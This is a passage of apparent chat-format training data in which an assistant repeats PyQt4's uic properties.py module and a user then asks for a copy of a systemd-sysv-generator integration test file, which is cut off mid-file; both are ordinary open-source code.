vsizetype, horstretch, verstretch = values\n hsizetype = QtGui.QSizePolicy.Policy(hsizetype)\n vsizetype = QtGui.QSizePolicy.Policy(vsizetype)\n\n sizePolicy = self.factory.createQObject(\"QSizePolicy\", \"sizePolicy\",\n (hsizetype, vsizetype), is_attribute=False)\n sizePolicy.setHorizontalStretch(horstretch)\n sizePolicy.setVerticalStretch(verstretch)\n sizePolicy.setHeightForWidth(widget.sizePolicy().hasHeightForWidth())\n return sizePolicy\n _sizepolicy = needsWidget(_sizepolicy)\n\n # font needs special handling/conversion of all child elements.\n _font_attributes = ((\"Family\", str),\n (\"PointSize\", int),\n (\"Bold\", bool_),\n (\"Italic\", bool_),\n (\"Underline\", bool_),\n (\"Weight\", int),\n (\"StrikeOut\", bool_),\n (\"Kerning\", bool_),\n (\"StyleStrategy\", qfont_enum))\n\n def _font(self, prop):\n newfont = self.factory.createQObject(\"QFont\", \"font\", (),\n is_attribute = False)\n for attr, converter in self._font_attributes:\n v = prop.findtext(\"./%s\" % (attr.lower(),))\n if v is None:\n continue\n\n getattr(newfont, \"set%s\" % (attr,))(converter(v))\n return newfont\n\n def _cursor(self, prop):\n return QtGui.QCursor(QtCore.Qt.CursorShape(int(prop.text)))\n\n def _cursorShape(self, prop):\n return QtGui.QCursor(getattr(QtCore.Qt, prop.text))\n\n def convert(self, prop, widget=None):\n try:\n func = getattr(self, \"_\" + prop[0].tag)\n except AttributeError:\n raise UnsupportedPropertyError(prop[0].tag)\n else:\n args = {}\n if getattr(func, \"needsWidget\", False):\n assert widget is not None\n args[\"widget\"] = widget\n\n return func(prop[0], **args)\n\n\n def _getChild(self, elem_tag, elem, name, default=None):\n for prop in elem.findall(elem_tag):\n if prop.attrib[\"name\"] == name:\n return self.convert(prop)\n else:\n return default\n\n def getProperty(self, elem, name, default=None):\n return self._getChild(\"property\", elem, name, default)\n\n def getAttribute(self, elem, name, default=None):\n return self._getChild(\"attribute\", elem, name, default)\n\n def setProperties(self, widget, elem):\n # Lines are sunken unless the frame shadow is explicitly set.\n set_sunken = (elem.attrib.get('class') == 'Line')\n\n for prop in elem.findall('property'):\n prop_name = prop.attrib['name']\n DEBUG(\"setting property %s\" % (prop_name,))\n\n if prop_name == 'frameShadow':\n set_sunken = False\n\n try:\n stdset = bool(int(prop.attrib['stdset']))\n except KeyError:\n stdset = True\n\n if not stdset:\n self._setViaSetProperty(widget, prop)\n elif hasattr(self, prop_name):\n getattr(self, prop_name)(widget, prop)\n else:\n prop_value = self.convert(prop, widget)\n if prop_value is not None:\n getattr(widget, 'set%s%s' % (ascii_upper(prop_name[0]), prop_name[1:]))(prop_value)\n\n if set_sunken:\n widget.setFrameShadow(QtGui.QFrame.Sunken)\n\n # SPECIAL PROPERTIES\n # If a property has a well-known value type but needs special,\n # context-dependent handling, the default behaviour can be overridden here.\n\n # Delayed properties will be set after the whole widget tree has been\n # populated.\n def _delayed_property(self, widget, prop):\n prop_value = self.convert(prop)\n if prop_value is not None:\n prop_name = prop.attrib[\"name\"]\n self.delayed_props.append((widget, False,\n 'set%s%s' % (ascii_upper(prop_name[0]), prop_name[1:]),\n prop_value))\n\n # These properties will be set with a widget.setProperty call rather than\n # calling the set<property> function.\n def _setViaSetProperty(self, widget, prop):\n prop_value = self.convert(prop)\n if prop_value is not None:\n prop_name = prop.attrib['name']\n\n # This appears to be a Designer/uic hack where stdset=0 means that\n # the viewport should be used.\n if prop[0].tag == 'cursorShape':\n widget.viewport().setProperty(prop_name, prop_value)\n else:\n widget.setProperty(prop_name, prop_value)\n\n # Ignore the property.\n def _ignore(self, widget, prop):\n pass\n\n # Define properties that use the canned handlers.\n currentIndex = _delayed_property\n currentRow = _delayed_property\n\n showDropIndicator = _setViaSetProperty\n intValue = _setViaSetProperty\n value = _setViaSetProperty\n\n objectName = _ignore\n margin = _ignore\n leftMargin = _ignore\n topMargin = _ignore\n rightMargin = _ignore\n bottomMargin = _ignore\n spacing = _ignore\n horizontalSpacing = _ignore\n verticalSpacing = _ignore\n\n # tabSpacing is actually the spacing property of the widget's layout.\n def tabSpacing(self, widget, prop):\n prop_value = self.convert(prop)\n if prop_value is not None:\n self.delayed_props.append((widget, True, 'setSpacing', prop_value))\n\n # buddy setting has to be done after the whole widget tree has been\n # populated. We can't use delay here because we cannot get the actual\n # buddy yet.\n def buddy(self, widget, prop):\n buddy_name = prop[0].text\n if buddy_name:\n self.buddies.append((widget, buddy_name))\n\n # geometry is handled specially if set on the toplevel widget.\n def geometry(self, widget, prop):\n if widget.objectName() == self.uiname:\n geom = int_list(prop[0])\n widget.resize(geom[2], geom[3])\n else:\n widget.setGeometry(self._rect(prop[0]))\n\n def orientation(self, widget, prop):\n # If the class is a QFrame, it's a line.\n if widget.metaObject().className() == \"QFrame\":\n widget.setFrameShape(\n {\"Qt::Horizontal\": QtGui.QFrame.HLine,\n \"Qt::Vertical\" : QtGui.QFrame.VLine}[prop[0].text])\n else:\n widget.setOrientation(self._enum(prop[0]))\n\n # The isWrapping attribute of QListView is named inconsistently, it should\n # be wrapping.\n def isWrapping(self, widget, prop):\n widget.setWrapping(self.convert(prop))\n\n # This is a pseudo-property injected to deal with margins.\n def pyuicMargins(self, widget, prop):\n left, top, right, bottom = int_list(prop)\n\n if left == top and left == right and left == bottom:\n widget.setMargin(left)\n else:\n widget.setContentsMargins(left, top, right, bottom)\n\n # This is a pseudo-property injected to deal with spacing.\n def pyuicSpacing(self, widget, prop):\n horiz, vert = int_list(prop)\n\n if horiz == vert:\n widget.setSpacing(horiz)\n else:\n if horiz >= 0:\n widget.setHorizontalSpacing(horiz)\n\n if vert >= 0:\n widget.setVerticalSpacing(vert)\n```<|memory_end|>",
"role": "user"
}
] |
```python
#############################################################################
##
## Copyright (C) 2015 Riverbank Computing Limited.
## Copyright (C) 2006 Thorsten Marek.
## All right reserved.
##
## This file is part of PyQt.
##
## You may use this file under the terms of the GPL v2 or the revised BSD
## license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of the Riverbank Computing Limited nor the names
## of its contributors may be used to endorse or promote products
## derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
#############################################################################
import logging
import os.path
import sys
from PyQt4.uic.exceptions import UnsupportedPropertyError
from PyQt4.uic.icon_cache import IconCache
if sys.hexversion >= 0x03000000:
from PyQt4.uic.port_v3.ascii_upper import ascii_upper
else:
from PyQt4.uic.port_v2.ascii_upper import ascii_upper
logger = logging.getLogger(__name__)
DEBUG = logger.debug
QtCore = None
QtGui = None
def int_list(prop):
return [int(child.text) for child in prop]
def float_list(prop):
return [float(child.text) for child in prop]
bool_ = lambda v: v == "true"
def qfont_enum(v):
return getattr(QtGui.QFont, v)
def needsWidget(func):
func.needsWidget = True
return func
class Properties(object):
def __init__(self, factory, QtCore_mod, QtGui_mod):
global QtGui, QtCore
QtGui = QtGui_mod
QtCore = QtCore_mod
self.factory = factory
self._base_dir = ''
self.reset()
def set_base_dir(self, base_dir):
""" Set the base directory to be used for all relative filenames. """
self._base_dir = base_dir
self.icon_cache.set_base_dir(base_dir)
def reset(self):
self.buddies = []
self.delayed_props = []
self.icon_cache = IconCache(self.factory, QtGui)
def _pyEnumMember(self, cpp_name):
try:
prefix, membername = cpp_name.split("::")
except ValueError:
prefix = "Qt"
membername = cpp_name
if prefix == "Qt":
return getattr(QtCore.Qt, membername)
scope = self.factory.findQObjectType(prefix)
if scope is None:
raise AttributeError("unknown enum %s" % cpp_name)
return getattr(scope, membername)
def _set(self, prop):
expr = [self._pyEnumMember(v) for v in prop.text.split('|')]
value = expr[0]
for v in expr[1:]:
value |= v
return value
def _enum(self, prop):
return self._pyEnumMember(prop.text)
def _number(self, prop):
return int(prop.text)
_uInt = _longLong = _uLongLong = _number
def _double(self, prop):
return float(prop.text)
def _bool(self, prop):
return prop.text == 'true'
def _stringlist(self, prop):
return [self._string(p, notr='true') for p in prop]
def _string(self, prop, notr=None):
text = prop.text
if text is None:
return ""
if prop.get('notr', notr) == 'true':
return text
disambig = prop.get('comment')
# Allow for Qt5 without deprecated features.
try:
encoding = QtGui.QApplication.UnicodeUTF8
translated = QtGui.QApplication.translate(self.uiname, text,
disambig, encoding)
except AttributeError:
translated = QtGui.QApplication.translate(self.uiname, text,
disambig)
return translated
_char = _string
def _cstring(self, prop):
return str(prop.text)
def _color(self, prop):
args = int_list(prop)
# Handle the optional alpha component.
alpha = int(prop.get("alpha", "255"))
if alpha != 255:
args.append(alpha)
return QtGui.QColor(*args)
def _point(self, prop):
return QtCore.QPoint(*int_list(prop))
def _pointf(self, prop):
return QtCore.QPointF(*float_list(prop))
def _rect(self, prop):
return QtCore.QRect(*int_list(prop))
def _rectf(self, prop):
return QtCore.QRectF(*float_list(prop))
def _size(self, prop):
return QtCore.QSize(*int_list(prop))
def _sizef(self, prop):
return QtCore.QSizeF(*float_list(prop))
def _pixmap(self, prop):
if prop.text:
fname = prop.text.replace("\\", "\\\\")
if self._base_dir != '' and fname[0] != ':' and not os.path.isabs(fname):
fname = os.path.join(self._base_dir, fname)
return QtGui.QPixmap(fname)
# Don't bother to set the property if the pixmap is empty.
return None
def _iconset(self, prop):
return self.icon_cache.get_icon(prop)
def _url(self, prop):
return QtCore.QUrl(prop[0].text)
def _locale(self, prop):
lang = getattr(QtCore.QLocale, prop.attrib['language'])
country = getattr(QtCore.QLocale, prop.attrib['country'])
return QtCore.QLocale(lang, country)
def _date(self, prop):
return QtCore.QDate(*int_list(prop))
def _datetime(self, prop):
args = int_list(prop)
return QtCore.QDateTime(QtCore.QDate(*args[-3:]), QtCore.QTime(*args[:-3]))
def _time(self, prop):
return QtCore.QTime(*int_list(prop))
def _gradient(self, prop):
name = 'gradient'
# Create the specific gradient.
gtype = prop.get('type', '')
if gtype == 'LinearGradient':
startx = float(prop.get('startx'))
starty = float(prop.get('starty'))
endx = float(prop.get('endx'))
endy = float(prop.get('endy'))
gradient = self.factory.createQObject('QLinearGradient', name,
(startx, starty, endx, endy), is_attribute=False)
elif gtype == 'ConicalGradient':
centralx = float(prop.get('centralx'))
centraly = float(prop.get('centraly'))
angle = float(prop.get('angle'))
gradient = self.factory.createQObject('QConicalGradient', name,
(centralx, centraly, angle), is_attribute=False)
elif gtype == 'RadialGradient':
centralx = float(prop.get('centralx'))
centraly = float(prop.get('centraly'))
radius = float(prop.get('radius'))
focalx = float(prop.get('focalx'))
focaly = float(prop.get('focaly'))
gradient = self.factory.createQObject('QRadialGradient', name,
(centralx, centraly, radius, focalx, focaly),
is_attribute=False)
else:
raise UnsupportedPropertyError(prop.tag)
# Set the common values.
spread = prop.get('spread')
if spread:
gradient.setSpread(getattr(QtGui.QGradient, spread))
cmode = prop.get('coordinatemode')
if cmode:
gradient.setCoordinateMode(getattr(QtGui.QGradient, cmode))
# Get the gradient stops.
for gstop in prop:
if gstop.tag != 'gradientstop':
raise UnsupportedPropertyError(gstop.tag)
position = float(gstop.get('position'))
color = self._color(gstop[0])
gradient.setColorAt(position, color)
return name
def _palette(self, prop):
palette = self.factory.createQObject("QPalette", "palette", (),
is_attribute=False)
for palette_elem in prop:
sub_palette = getattr(QtGui.QPalette, palette_elem.tag.title())
for role, color in enumerate(palette_elem):
if color.tag == 'color':
# Handle simple colour descriptions where the role is
# implied by the colour's position.
palette.setColor(sub_palette,
QtGui.QPalette.ColorRole(role), self._color(color))
elif color.tag == 'colorrole':
role = getattr(QtGui.QPalette, color.get('role'))
brush = self._brush(color[0])
palette.setBrush(sub_palette, role, brush)
else:
raise UnsupportedPropertyError(color.tag)
return palette
def _brush(self, prop):
brushstyle = prop.get('brushstyle')
if brushstyle in ('LinearGradientPattern', 'ConicalGradientPattern', 'RadialGradientPattern'):
gradient = self._gradient(prop[0])
brush = self.factory.createQObject("QBrush", "brush", (gradient, ),
is_attribute=False)
else:
color = self._color(prop[0])
brush = self.factory.createQObject("QBrush", "brush", (color, ),
is_attribute=False)
brushstyle = getattr(QtCore.Qt, brushstyle)
brush.setStyle(brushstyle)
return brush
#@needsWidget
def _sizepolicy(self, prop, widget):
values = [int(child.text) for child in prop]
if len(values) == 2:
# Qt v4.3.0 and later.
horstretch, verstretch = values
hsizetype = getattr(QtGui.QSizePolicy, prop.get('hsizetype'))
vsizetype = getattr(QtGui.QSizePolicy, prop.get('vsizetype'))
else:
hsizetype, vsizetype, horstretch, verstretch = values
hsizetype = QtGui.QSizePolicy.Policy(hsizetype)
vsizetype = QtGui.QSizePolicy.Policy(vsizetype)
sizePolicy = self.factory.createQObject("QSizePolicy", "sizePolicy",
(hsizetype, vsizetype), is_attribute=False)
sizePolicy.setHorizontalStretch(horstretch)
sizePolicy.setVerticalStretch(verstretch)
sizePolicy.setHeightForWidth(widget.sizePolicy().hasHeightForWidth())
return sizePolicy
_sizepolicy = needsWidget(_sizepolicy)
# font needs special handling/conversion of all child elements.
_font_attributes = (("Family", str),
("PointSize", int),
("Bold", bool_),
("Italic", bool_),
("Underline", bool_),
("Weight", int),
("StrikeOut", bool_),
("Kerning", bool_),
("StyleStrategy", qfont_enum))
def _font(self, prop):
newfont = self.factory.createQObject("QFont", "font", (),
is_attribute = False)
for attr, converter in self._font_attributes:
v = prop.findtext("./%s" % (attr.lower(),))
if v is None:
continue
getattr(newfont, "set%s" % (attr,))(converter(v))
return newfont
def _cursor(self, prop):
return QtGui.QCursor(QtCore.Qt.CursorShape(int(prop.text)))
def _cursorShape(self, prop):
return QtGui.QCursor(getattr(QtCore.Qt, prop.text))
def convert(self, prop, widget=None):
try:
func = getattr(self, "_" + prop[0].tag)
except AttributeError:
raise UnsupportedPropertyError(prop[0].tag)
else:
args = {}
if getattr(func, "needsWidget", False):
assert widget is not None
args["widget"] = widget
return func(prop[0], **args)
def _getChild(self, elem_tag, elem, name, default=None):
for prop in elem.findall(elem_tag):
if prop.attrib["name"] == name:
return self.convert(prop)
else:
return default
def getProperty(self, elem, name, default=None):
return self._getChild("property", elem, name, default)
def getAttribute(self, elem, name, default=None):
return self._getChild("attribute", elem, name, default)
def setProperties(self, widget, elem):
# Lines are sunken unless the frame shadow is explicitly set.
set_sunken = (elem.attrib.get('class') == 'Line')
for prop in elem.findall('property'):
prop_name = prop.attrib['name']
DEBUG("setting property %s" % (prop_name,))
if prop_name == 'frameShadow':
set_sunken = False
try:
stdset = bool(int(prop.attrib['stdset']))
except KeyError:
stdset = True
if not stdset:
self._setViaSetProperty(widget, prop)
elif hasattr(self, prop_name):
getattr(self, prop_name)(widget, prop)
else:
prop_value = self.convert(prop, widget)
if prop_value is not None:
getattr(widget, 'set%s%s' % (ascii_upper(prop_name[0]), prop_name[1:]))(prop_value)
if set_sunken:
widget.setFrameShadow(QtGui.QFrame.Sunken)
# SPECIAL PROPERTIES
# If a property has a well-known value type but needs special,
# context-dependent handling, the default behaviour can be overridden here.
# Delayed properties will be set after the whole widget tree has been
# populated.
def _delayed_property(self, widget, prop):
prop_value = self.convert(prop)
if prop_value is not None:
prop_name = prop.attrib["name"]
self.delayed_props.append((widget, False,
'set%s%s' % (ascii_upper(prop_name[0]), prop_name[1:]),
prop_value))
# These properties will be set with a widget.setProperty call rather than
# calling the set<property> function.
def _setViaSetProperty(self, widget, prop):
prop_value = self.convert(prop)
if prop_value is not None:
prop_name = prop.attrib['name']
# This appears to be a Designer/uic hack where stdset=0 means that
# the viewport should be used.
if prop[0].tag == 'cursorShape':
widget.viewport().setProperty(prop_name, prop_value)
else:
widget.setProperty(prop_name, prop_value)
# Ignore the property.
def _ignore(self, widget, prop):
pass
# Define properties that use the canned handlers.
currentIndex = _delayed_property
currentRow = _delayed_property
showDropIndicator = _setViaSetProperty
intValue = _setViaSetProperty
value = _setViaSetProperty
objectName = _ignore
margin = _ignore
leftMargin = _ignore
topMargin = _ignore
rightMargin = _ignore
bottomMargin = _ignore
spacing = _ignore
horizontalSpacing = _ignore
verticalSpacing = _ignore
# tabSpacing is actually the spacing property of the widget's layout.
def tabSpacing(self, widget, prop):
prop_value = self.convert(prop)
if prop_value is not None:
self.delayed_props.append((widget, True, 'setSpacing', prop_value))
# buddy setting has to be done after the whole widget tree has been
# populated. We can't use delay here because we cannot get the actual
# buddy yet.
def buddy(self, widget, prop):
buddy_name = prop[0].text
if buddy_name:
self.buddies.append((widget, buddy_name))
# geometry is handled specially if set on the toplevel widget.
def geometry(self, widget, prop):
if widget.objectName() == self.uiname:
geom = int_list(prop[0])
widget.resize(geom[2], geom[3])
else:
widget.setGeometry(self._rect(prop[0]))
def orientation(self, widget, prop):
# If the class is a QFrame, it's a line.
if widget.metaObject().className() == "QFrame":
widget.setFrameShape(
{"Qt::Horizontal": QtGui.QFrame.HLine,
"Qt::Vertical" : QtGui.QFrame.VLine}[prop[0].text])
else:
widget.setOrientation(self._enum(prop[0]))
# The isWrapping attribute of QListView is named inconsistently, it should
# be wrapping.
def isWrapping(self, widget, prop):
widget.setWrapping(self.convert(prop))
# This is a pseudo-property injected to deal with margins.
def pyuicMargins(self, widget, prop):
left, top, right, bottom = int_list(prop)
if left == top and left == right and left == bottom:
widget.setMargin(left)
else:
widget.setContentsMargins(left, top, right, bottom)
# This is a pseudo-property injected to deal with spacing.
def pyuicSpacing(self, widget, prop):
horiz, vert = int_list(prop)
if horiz == vert:
widget.setSpacing(horiz)
else:
if horiz >= 0:
widget.setHorizontalSpacing(horiz)
if vert >= 0:
widget.setVerticalSpacing(vert)
```
|
[
{
"content": "Repeat the following code:\n```python\n# systemd-sysv-generator integration test\n#\n# (C) 2015 Canonical Ltd.\n# Author: Martin Pitt <[email protected]>\n#\n# systemd is free software; you can redistribute it and/or modify it\n# under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation; either version 2.1 of the License, or\n# (at your option) any later version.\n\n# systemd is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with systemd; If not, see <http://www.gnu.org/licenses/>.\n\nimport unittest\nimport sys\nimport os\nimport subprocess\nimport tempfile\nimport shutil\nfrom glob import glob\n\ntry:\n from configparser import RawConfigParser\nexcept ImportError:\n # python 2\n from ConfigParser import RawConfigParser\n\nsysv_generator = os.path.join(os.environ.get('builddir', '.'), 'systemd-sysv-generator')\n\n\nclass SysvGeneratorTest(unittest.TestCase):\n def setUp(self):\n self.workdir = tempfile.mkdtemp(prefix='sysv-gen-test.')\n self.init_d_dir = os.path.join(self.workdir, 'init.d')\n os.mkdir(self.init_d_dir)\n self.rcnd_dir = self.workdir\n self.unit_dir = os.path.join(self.workdir, 'systemd')\n os.mkdir(self.unit_dir)\n self.out_dir = os.path.join(self.workdir, 'output')\n os.mkdir(self.out_dir)\n\n def tearDown(self):\n shutil.rmtree(self.workdir)\n\n #\n # Helper methods\n #\n\n def run_generator(self, expect_error=False):\n '''Run sysv-generator.\n\n Fail if stderr contains any \"Fail\", unless expect_error is True.\n Return (stderr, filename -> ConfigParser) pair with ouput to stderr and\n parsed generated units.\n '''\n env = os.environ.copy()\n env['SYSTEMD_LOG_LEVEL'] = 'debug'\n env['SYSTEMD_SYSVINIT_PATH'] = self.init_d_dir\n env['SYSTEMD_SYSVRCND_PATH'] = self.rcnd_dir\n env['SYSTEMD_UNIT_PATH'] = self.unit_dir\n gen = subprocess.Popen(\n [sysv_generator, 'ignored', 'ignored', self.out_dir],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n universal_newlines=True, env=env)\n (out, err) = gen.communicate()\n if not expect_error:\n self.assertFalse('Fail' in err, err)\n self.assertEqual(gen.returncode, 0, err)\n\n results = {}\n for service in glob(self.out_dir + '/*.service'):\n if os.path.islink(service):\n continue\n cp = RawConfigParser()\n cp.optionxform = lambda o: o # don't lower-case option names\n with open(service) as f:\n cp.readfp(f)\n results[os.path.basename(service)] = cp\n\n return (err, results)\n\n def add_sysv(self, fname, keys, enable=False, prio=1):\n '''Create a SysV init script with the given keys in the LSB header\n\n There are sensible default values for all fields.\n If enable is True, links will be created in the rcN.d dirs. In that\n case, the priority can be given with \"prio\" (default to 1).\n\n Return path of generated script.\n '''\n name_without_sh = fname.endswith('.sh') and fname[:-3] or fname\n keys.setdefault('Provides', name_without_sh)\n keys.setdefault('Required-Start', '$local_fs')\n keys.setdefault('Required-Stop', keys['Required-Start'])\n keys.setdefault('Default-Start', '2 3 4 5')\n keys.setdefault('Default-Stop', '0 1 6')\n keys.setdefault('Short-Description', 'test %s service' %\n name_without_sh)\n keys.setdefault('Description', 'long description for test %s service' %\n name_without_sh)\n script = os.path.join(self.init_d_dir, fname)\n with open(script, 'w') as f:\n f.write('#!/bin/init-d-interpreter\\n### BEGIN INIT INFO\\n')\n for k, v in keys.items():\n if v is not None:\n f.write('#%20s %s\\n' % (k + ':', v))\n f.write('### END INIT INFO\\ncode --goes here\\n')\n os.chmod(script, 0o755)\n\n if enable:\n def make_link(prefix, runlevel):\n d = os.path.join(self.rcnd_dir, 'rc%s.d' % runlevel)\n if not os.path.isdir(d):\n os.mkdir(d)\n os.symlink('../init.d/' + fname, os.path.join(d, prefix + fname))\n\n for rl in keys['Default-Start'].split():\n make_link('S%02i' % prio, rl)\n for rl in keys['Default-Stop'].split():\n make_link('K%02i' % (99 - prio), rl)\n\n return script\n\n def assert_enabled(self, unit, runlevels):\n '''assert that a unit is enabled in precisely the given runlevels'''\n\n all_runlevels = [2, 3, 4, 5]\n\n # should be enabled\n for runlevel in all_runlevels:\n link = os.path.join(self.out_dir, 'runlevel%i.target.wants' % runlevel, unit)\n if runlevel in runlevels:\n target = os.readlink(link)\n self.assertTrue(os.path.exists(target))\n self.assertEqual(os.path.basename(target), unit)\n else:\n self.assertFalse(os.path.exists(link),\n '%s unexpectedly exists' % link)\n\n #\n # test cases\n #\n\n def test_nothing(self):\n '''no input files'''\n\n results = self.run_generator()[1]\n self.assertEqual(results, {})\n self.assertEqual(os.listdir(self.out_dir), [])\n\n def test_simple_disabled(self):\n '''simple service without dependencies, disabled'''\n\n self.add_sysv('foo', {}, enable=False)\n err, results = self.run_generator()\n self.assertEqual(len(results), 1)\n\n # no enablement links or other stuff\n self.assertEqual(os.listdir(self.out_dir), ['foo.service'])\n\n s = results['foo.service']\n self.assertEqual(s.sections(), ['Unit', 'Service'])\n self.assertEqual(s.get('Unit', 'Description'), 'LSB: test foo service')\n # $local_fs does not need translation, don't expect any dependency\n # fields here\n self.assertEqual(set(s.options('Unit')),\n set(['Documentation', 'SourcePath', 'Description']))\n\n self.assertEqual(s.get('Service', 'Type'), 'forking')\n init_script = os.path.join(self.init_d_dir, 'foo')\n self.assertEqual(s.get('Service', 'ExecStart'),\n '%s start' % init_script)\n self.assertEqual(s.get('Service', 'ExecStop'),\n '%s stop' % init_script)\n\n self.assertNotIn('Overwriting', err)\n\n def test_simple_enabled_all(self):\n '''simple service without dependencies, enabled in all runlevels'''\n\n self.add_sysv('foo', {}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n self.assertNotIn('Overwriting', err)\n\n def test_simple_enabled_some(self):\n '''simple service without dependencies, enabled in some runlevels'''\n\n self.add_sysv('foo', {'Default-Start': '2 4'}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n self.assert_enabled('foo.service', [2, 4])\n\n def test_lsb_macro_dep_single(self):\n '''single LSB macro dependency: $network'''\n\n self.add_sysv('foo', {'Required-Start': '$network'})\n s = self.run_generator()[1]['foo.service']\n self.assertEqual(set(s.options('Unit')),\n set(['Documentation', 'SourcePath', 'Description', 'After', 'Wants']))\n self.assertEqual(s.get('Unit', 'After'), 'network-online.target')\n self.assertEqual(s.get('Unit', 'Wants'), 'network-online.target')\n\n def test_lsb_macro_dep_multi(self):\n '''multiple LSB macro dependencies'''\n\n self.add_sysv('foo', {'Required-Start': '$named $portmap'})\n s = self.run_generator()[1]['foo.service']\n self.assertEqual(set(s.options('Unit')),\n set(['Documentation', 'SourcePath', 'Description', 'After']))\n self.assertEqual(s.get('Unit', 'After'), 'nss-lookup.target rpcbind.target')\n\n def test_lsb_deps(self):\n '''LSB header dependencies to other services'''\n\n # also give symlink priorities here; they should be ignored\n self.add_sysv('foo', {'Required-Start': 'must1 must2',\n 'Should-Start': 'may1 ne_may2'},\n enable=True, prio=40)\n self.add_sysv('must1', {}, enable=True, prio=10)\n self.add_sysv('must2', {}, enable=True, prio=15)\n self.add_sysv('may1', {}, enable=True, prio=20)\n # do not create ne_may2\n err, results = self.run_generator()\n self.assertEqual(sorted(results),\n ['foo.service', 'may1.service', 'must1.service', 'must2.service'])\n\n # foo should depend on all of them\n self.assertEqual(sorted(results['foo.service'].get('Unit', 'After').split()),\n ['may1.service', 'must1.service', 'must2.service', 'ne_may2.service'])\n\n # other services should not depend on each other\n self.assertFalse(results['must1.service'].has_option('Unit', 'After'))\n self.assertFalse(results['must2.service'].has_option('Unit', 'After'))\n self.assertFalse(results['may1.service'].has_option('Unit', 'After'))\n\n def test_symlink_prio_deps(self):\n '''script without LSB headers use rcN.d priority'''\n\n # create two init.d scripts without LSB header and enable them with\n # startup priorities\n for prio, name in [(10, 'provider'), (15, 'consumer')]:\n with open(os.path.join(self.init_d_dir, name), 'w') as f:\n f.write('#!/bin/init-d-interpreter\\ncode --goes here\\n')\n os.fchmod(f.fileno(), 0o755)\n\n d = os.path.join(self.rcnd_dir, 'rc2.d')\n if not os.path.isdir(d):\n os.mkdir(d)\n os.symlink('../init.d/' + name, os.path.join(d, 'S%02i%s' % (prio, name)))\n\n err, results = self.run_generator()\n self.assertEqual(sorted(results), ['consumer.service', 'provider.service'])\n self.assertFalse(results['provider.service'].has_option('Unit', 'After'))\n self.assertEqual(results['consumer.service'].get('Unit', 'After'),\n 'provider.service')\n\n def test_multiple_provides(self):\n '''multiple Provides: names'''\n\n self.add_sysv('foo', {'Provides': 'foo bar baz'})\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n self.assertEqual(set(results['foo.service'].options('Unit')),\n set(['Documentation', 'SourcePath', 'Description']))\n # should create symlinks for the alternative names\n for f in ['bar.service', 'baz.service']:\n self.assertEqual(os.readlink(os.path.join(self.out_dir, f)),\n 'foo.service')\n self.assertNotIn('Overwriting', err)\n\n def test_same_provides_in_multiple_scripts(self):\n '''multiple init.d scripts provide the same name'''\n\n self.add_sysv('foo', {'Provides': 'foo common'}, enable=True, prio=1)\n self.add_sysv('bar', {'Provides': 'bar common'}, enable=True, prio=2)\n err, results = self.run_generator()\n self.assertEqual(sorted(results), ['bar.service', 'foo.service'])\n # should create symlink for the alternative name for either unit\n self.assertIn(os.readlink(os.path.join(self.out_dir, 'common.service')),\n ['foo.service', 'bar.service'])\n\n def test_provide_other_script(self):\n '''init.d scripts provides the name of another init.d script'''\n\n self.add_sysv('foo', {'Provides': 'foo bar'}, enable=True)\n self.add_sysv('bar', {'Provides': 'bar'}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(sorted(results), ['bar.service', 'foo.service'])\n # we do expect an overwrite here, bar.service should overwrite the\n # alias link from foo.service\n self.assertIn('Overwriting', err)\n\n def test_nonexecutable_script(self):\n '''ignores non-executable init.d script'''\n\n os.chmod(self.add_sysv('foo', {}), 0o644)\n err, results = self.run_generator()\n self.assertEqual(results, {})\n\n def test_sh_suffix(self):\n '''init.d script with .sh suffix'''\n\n self.add_sysv('foo.sh', {}, enable=True)\n err, results = self.run_generator()\n s = results['foo.service']\n\n self.assertEqual(s.sections(), ['Unit', 'Service'])\n # should not have a .sh\n self.assertEqual(s.get('Unit', 'Description'), 'LSB: test foo service')\n\n # calls correct script with .sh\n init_script = os.path.join(self.init_d_dir, 'foo.sh')\n self.assertEqual(s.get('Service', 'ExecStart'),\n '%s start' % init_script)\n self.assertEqual(s.get('Service', 'ExecStop'),\n '%s stop' % init_script)\n\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n\n def test_sh_suffix_with_provides(self):\n '''init.d script with .sh suffix and Provides:'''\n\n self.add_sysv('foo.sh', {'Provides': 'foo bar'})\n err, results = self.run_generator()\n # ensure we don't try to create a symlink to itself\n self.assertNotIn('itself', err)\n self.assertEqual(list(results), ['foo.service'])\n self.assertEqual(results['foo.service'].get('Unit', 'Description'),\n 'LSB: test foo service')\n\n # should create symlink for the alternative name\n 